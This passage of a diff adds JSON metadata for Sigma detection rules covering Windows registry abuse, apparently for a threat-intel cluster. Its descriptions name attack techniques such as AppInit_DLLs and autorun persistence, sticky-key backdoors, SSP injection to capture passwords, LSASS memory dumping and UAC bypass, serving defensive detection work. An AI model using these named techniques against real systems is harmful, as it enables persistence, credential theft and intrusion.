"2019/10/25", + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "value": "New DLL Added to AppInit_DLLs Registry Key", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.010" + ], + "creation_date": "2019/10/25", + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "value": "Office Application Startup - Office Test", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1137/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.002" + ], + "creation_date": "2020/10/25", + "filename": "registry_event_office_test_regadd.yml", + "author": "omkar72", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects persistence registry keys for Recycle Bin", + "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", + "value": "Registry Persistence Mechanisms in Recycle Bin", + "meta": { + "refs": [ + "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + "https://persistence-info.github.io/Data/recyclebin.html", + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2021/11/18", + "filename": "registry_event_persistence_recycle_bin.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "value": "PortProxy Registry Key", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2021/06/22", + "filename": "registry_event_portproxy_registry_key.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "medium", + "falsepositive": [ + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "value": "RedMimicry Winnti Playbook Registry Manipulation", + "meta": { + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/06/24", + "filename": "registry_event_redmimicry_winnti_reg.yml", + "author": "Alexander Rausch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "value": "WINEKEY Registry Modification", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2020/10/30", + "filename": "registry_event_runkey_winekey.yml", + "author": "omkar72", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "value": "Run Once Task Configuration in Registry", + "meta": { + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/11/15", + "filename": "registry_event_runonce_persistence.yml", + "author": "Avneet Singh @v3t0_, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate modification of the registry key by legitimate program" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "value": "Shell Open Registry Keys Manipulation", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" + ], + "creation_date": "2021/08/30", + "filename": "registry_event_shell_open_keys_manipulation.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", + "value": "SilentProcessExit Monitor Registration for LSASS", + "meta": { + "refs": [ + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.007" + ], + "creation_date": "2021/02/26", + "filename": "registry_event_silentprocessexit_lsass.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "value": "Security Support Provider (SSP) Added to LSA Configuration", + "meta": { + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.005" + ], + "creation_date": "2019/01/18", + "filename": "registry_event_ssp_added_lsa_config.yml", + "author": "iwillkeepwatch", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "value": "Sticky Key Like Backdoor Usage - Registry", + "meta": { + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ], + "creation_date": "2018/03/15", + "filename": "registry_event_stickykey_like_backdoor.yml", + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "value": "Atbroker Registry Change", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2020/10/13", + "filename": "registry_event_susp_atbroker_change.yml", + "author": "Mateusz Wydra, oscd.community", + "level": "medium", + "falsepositive": [ + "Creation of non-default, legitimate at usage" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "value": "Suspicious Run Key from Download", + "meta": { + "refs": [ + "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/01", + "filename": "registry_event_susp_download_run_key.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Software installers downloaded and used by users" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "value": "DLL Load via LSASS", + "meta": { + "refs": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://twitter.com/SBousseaden/status/1183745981189427200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1547.008" + ], + "creation_date": "2019/10/16", + "filename": "registry_event_susp_lsass_dll_load.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", + "value": "Suspicious Camera and Microphone Access", + "meta": { + "refs": [ + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1125", + "attack.t1123" + ], + "creation_date": "2020/06/07", + "filename": "registry_event_susp_mic_cam_access.yml", + "author": "Den Iuzvyk", + "level": "high", + "falsepositive": [ + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "value": "Windows Registry Trust Record Modification", + "meta": { + "refs": [ + "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", + "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2020/02/19", + "filename": "registry_event_trust_record_modification.yml", + "author": "Antonlovesdnb", + "level": "medium", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "uuid": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", + "value": "Abusing Windows Telemetry For Persistence - Registry", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112", + "attack.t1053" + ], + "creation_date": "2020/09/29", + "filename": "registry_set_abusing_windows_telemetry_for_persistence.yml", + "author": "Sreeman", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", + "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", + "value": "User Account Hidden By Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ], + "creation_date": "2022/08/20", + "filename": "registry_set_add_hidden_user.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "value": "Registry Persitence via Service in Safe Mode", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/04/04", + "filename": "registry_set_add_load_service_in_safe_mode.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "value": "Add Port Monitor Persistence in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ], + "creation_date": "2021/12/30", + "filename": "registry_set_add_port_monitor.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "uuid": "092af964-4233-4373-b4ba-d86ea2890288", + "value": "Add Debugger Entry To AeDebug For Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/aedebug.html", + "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_aedebug_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "value": "Allow RDP Remote Assistance Feature", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitmate use of the feature (alerts should be investigated either way)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "9df5f547-c86a-433e-b533-f2794357e242", + "value": "Classes Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_classes.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "value": "Common Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://persistence-info.github.io/Data/userinitmprlogonscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_common.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "value": "CurrentControlSet Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "value": "CurrentVersion Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "value": "CurrentVersion NT Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "value": "Internet Explorer Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "value": "Office Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_office.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "value": "Session Manager Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "value": "System Scripts Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "value": "WinSock2 Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + 